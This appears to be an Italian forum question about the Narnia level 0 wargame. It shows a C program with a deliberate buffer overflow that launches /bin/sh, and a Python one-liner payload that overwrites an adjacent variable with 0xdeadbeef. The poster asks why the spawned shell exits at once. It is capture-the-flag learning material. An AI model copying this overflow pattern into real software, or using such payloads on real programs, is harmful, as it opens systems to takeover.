Problema:
Perché il processo system ("/ bin / sh") termina immediatamente anziché attendere l'input dell'utente?
Codice:
int main(){
long val=0x41414141;
char buf[20];
printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
printf("Here is your chance: ");
scanf("%24s",&buf);
printf("buf: %s\n",buf);
printf("val: 0x%08x\n",val);
if(val==0xdeadbeef)
system("/bin/sh");
else {
printf("WAY OFF!!!!\n");
exit(1);
}
return 0;
}
Esecuzione campione:
narnia0@melinda:/narnia$ (python -c "print 'A'*20+'\xef\xbe\xad\xde'") | ./narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ?
val: 0xdeadbeef
narnia0@melinda:/narnia$